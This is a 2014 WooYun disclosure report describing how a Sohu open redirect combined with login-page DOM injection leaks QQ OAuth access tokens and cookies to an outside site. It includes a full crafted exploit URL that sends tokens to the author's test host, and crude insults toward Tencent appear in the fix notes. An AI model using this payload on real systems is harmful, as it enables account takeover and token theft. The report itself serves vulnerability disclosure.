当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068332

漏洞标题:搜狐Open Redirect导致QQ资料泄露(可导致微博随便发)

相关厂商:搜狐

漏洞作者: 爱上电饭锅

提交时间:2014-07-15 12:29

修复时间:2014-08-29 12:30

公开时间:2014-08-29 12:30

漏洞类型:URL跳转

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-15: 细节已通知厂商并且等待厂商处理中
2014-07-15: 厂商已经确认,细节仅向厂商公开
2014-07-25: 细节向核心白帽子及相关领域专家公开
2014-08-04: 细节向普通白帽子公开
2014-08-14: 细节向实习白帽子公开
2014-08-29: 细节向公众公开

简要描述:

quan.sohu.com下存在跳转URL,sohu主站登录存在DOM注入。两者合并可导致修改QQ OAuth认证环节的跳转代码,导致token可被任意网站获取。
另外,DOM注入环节就算不注入HTML,把网址换了也是很危险的,登录成功后跳转任意网址,可窃取cookie。
这么多洞在一个贴里,来个高分吧,哈哈哈。

详细说明:

1. 出问题的网址是http://quan.sohu.com/api/redirect?url=,这个网址存在随意跳情况。
2. 观察发现QQ链接方面限定跳转URL,发现限定域在*.sohu.com里。上面的域名也在,这是要被拿下的节奏。
3. 把url参数改为第三方恶意网站,这里改成我自己的测试站。即跳转网址变为:http://quan.sohu.com/api/redirect?url=http://weichch.apphb.com/qq?clientid=100327010%23。结尾用了一个URI编码的hash,因为腾讯会把编码的hash变为真正的hash,然后让一个可以传到server的URL顺理成章的变成了浏览器行为,不会被server捕捉到的hash。此问题已经反映给腾讯,不过腾讯那帮sb似乎不认为这是bug。那就让他公开吧。
4. 利用sohu主站登录页面的DOM注入,修改一下QQ登录的链接。拿下。
--------------------分割线----------------------------
5. 如果DOM注入那里不注入HTML,随便改个网址,登录后会跳到那个网址,可取得cookie。

漏洞证明:

1. 到搜狐主站进行DOM注入,即访问以下网址:
http://i.sohu.com/login/logon.do?bru=http://i.sohu.com/home.htm%22%20style=%22display:none;%22%3E%3Ca%20href=%22http://openapi.qzone.qq.com/oauth/show?which=ConfirmPage%26display=pc%26client_id=100327010%26response_type=token%26state=O2CRSFab570709a25c40c9afcc9163f88622d2%26scope=get_user_info,add_share,list_album,upload_pic,check_page_fans,add_t,add_pic_t,del_t,get_repost_list,get_info,get_other_info,get_fanslist,get_idolist,add_idol,del_idol,add_one_blog,add_topic,get_tenpay_addr%26redirect_uri=http://quan.sohu.com/api/redirect?url=http://weichch.apphb.com/qq?clientid=100327010%23
2. 点使用QQ登录。用QQ登录一个小号,发现页面被跳转到第三方网站(我自己的测试网站),参数里存在access_token等敏感信息。
3. 关于详细说明步骤5里我不想证明了,sohu程序员随便试下就可以了。
附上几张图吧:

QQ图片20140709214904.jpg


QQ截图20140709215039.png


QQ截图20140709215115.png

修复方案:

1. 修Open Redirect的地方。
2. 找腾讯那些SB理论以下,为什么hash被转回来了,还tmd不承认是bug。
3. 看腾讯那些SB能不能把URL跳转像其他网站(百度、人人等)限定死。
4. 如果SB们不肯改,那这个洞无法修复。只能修修DOM注入了 :)

版权声明:转载请注明来源 爱上电饭锅@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-15 15:33

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-07-15 13:46 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    这个竟然没给你上首页

  2. 2014-07-16 17:49 | 爱上电饭锅 ( 实习白帽子 | Rank:33 漏洞数:5 | Web开发,专注XSS,顺便挖些小洞。)

    这个还不够上首页的标准吧。最近没有挖洞的欲望。

  3. 2014-07-16 17:49 | 爱上电饭锅 ( 实习白帽子 | Rank:33 漏洞数:5 | Web开发,专注XSS,顺便挖些小洞。)

    @小川 这个还不够上首页的标准吧。最近没有挖洞的欲望。

  4. 2014-07-16 17:50 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @爱上电饭锅 不用一上来就挖那么NB的